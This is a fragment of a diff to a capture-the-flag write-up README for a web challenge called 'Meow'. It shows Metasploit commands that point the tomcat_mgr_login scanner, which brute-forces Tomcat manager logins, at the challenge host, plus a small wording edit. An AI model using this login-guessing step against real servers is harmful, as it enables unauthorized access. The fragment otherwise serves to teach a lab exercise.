starkindustries/laptop-hacking-coffee/Web/Meow/README.md

    VHOST                                                                                             no        HTTP server virtual host
 ```

-Note that the `RPORT` is already set to 8080.
+Note that the `RPORT` is already set to port 8080.
 Set the `RHOSTS` option to the LHC website and run the exploit:
 ```
 msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS challenges.laptophackingcoffee.org
 RHOSTS => challenges.laptophackingcoffee.org